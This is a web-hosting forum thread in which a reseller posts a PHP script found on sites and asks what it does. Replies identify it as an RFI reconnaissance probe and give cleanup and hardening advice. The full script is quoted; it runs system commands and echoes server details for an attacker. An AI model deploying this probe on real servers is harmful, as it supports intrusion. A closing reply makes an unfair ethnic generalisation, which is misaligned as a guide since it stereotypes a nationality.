Possible Hack Attemps? Any Idea What This Script Does?

Hey Guys,

Anyone out their have any idea what this script is for?

I have a bad feeling some people are trying to obtain my server passwords and information. I have been finding these sites that are running the following script.

If you have any idea what this script is ment to do please post.

Thanks.

====
script below
====

<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}

return sprintf("%0.2f Gb", $number/1024/1024/1024);

}

echo "kangkung<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;


echo "kangkung was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

==============================================

 

I would say that your server had something hacked. The top function looks like it is just for formatting numbers. The bottom code it most likely what the person that hacked the server left to show that they were there.

Where did you find this at?

 

Found this while looking at referrals via cpanel (lastest visitors).

Do you think they have access to account passwords or?

Brian

 

It could be several things, possibly/hopefully just some injection into a page through an unsecure script.

Make sure you have exec, shell_exec, system disabled in your php.ini. You may also want to use suphp which can help prevent your server from being taken over if someone gains access to php.

If you have ssh access you should probably search through your entire /home directory and see if this person has gained access to anywhere else. SSH into the /home and use something like:

find . | xargs grep 'kangkung' -sl

Also check your access logs for this person's IP and see where they have been.

Is this a shared server or is it yours?

 

Resellars account on Hostgator.

Thanks for the info ;-)

 

This script is used in botnets to test for RFI exploits, basically your website has been used to spread bots across other servers, congrats.

might want to read up on blocking perl bots ( rfi scanners / ddosers )

 

This script is what hackers like to call a "php shell", it is programmed to control your system in a GUI-style interface, or show information about the server. It is included from a remote location and mostly used for holes like Remote File Inclusion.

If you find it on your server, remove it as soon as possible.

With the information you see now: no, this script is just an information script that shows how useful the targeted server actually is for usage.

 

No.
If you find it on your server, go unplug it, make an image of the harddrive for backup and forensics evidence, find how they hacked you, and reinstall the server.

Why does everyone always underestimate the hackings ?
The title of the thread is "Possible hack attempt" and I see a successful hack.
And now the advice given is just "Remove what you see"... but that script is probably not everything left on the server.

The server might has been rootkitted and you'd have no way to know.

Reinstalling the server and restoring clean backups is the only correct solution to that sort of problems.

 

I know this isn't for every administrator (it should be though), but doing a little forensic search can easily show you the source of the hack. There is no need to react in an extreme way, especially if you're a reseller. This stuff happens, clients will always upload junk stuff without knowing the possible consequences.

The only way to secure yourself is properly updating your server with good software and making sure every single website runs in its own environment, then they can put the evilest php shell on it, your server won't get affected: only the attacked target will.

 

Something somewhat concerning is that this is a shared server. Your scripts may be completely secure and this hack could have been performed on another account.

It would probably be best to notify hostgator of this and get your sites moved to a new server. You should most definitely go through and make sure that none of your scripts were altered as it's completely possible that they coded something that would give them access to your website. You should also make sure that none of your scripts are open to injection or other malicious attacks.

As 'uski' suggested the only way to surely get rid of rootkits and a lot of other hacks is to flatten the server and start over. It's very difficult to figure out what was compromised and what was changed to any degree of accuracy.

 

kangkung is an indonesian word. these indonesian are so into hacking. why is this file in your ftp anyway?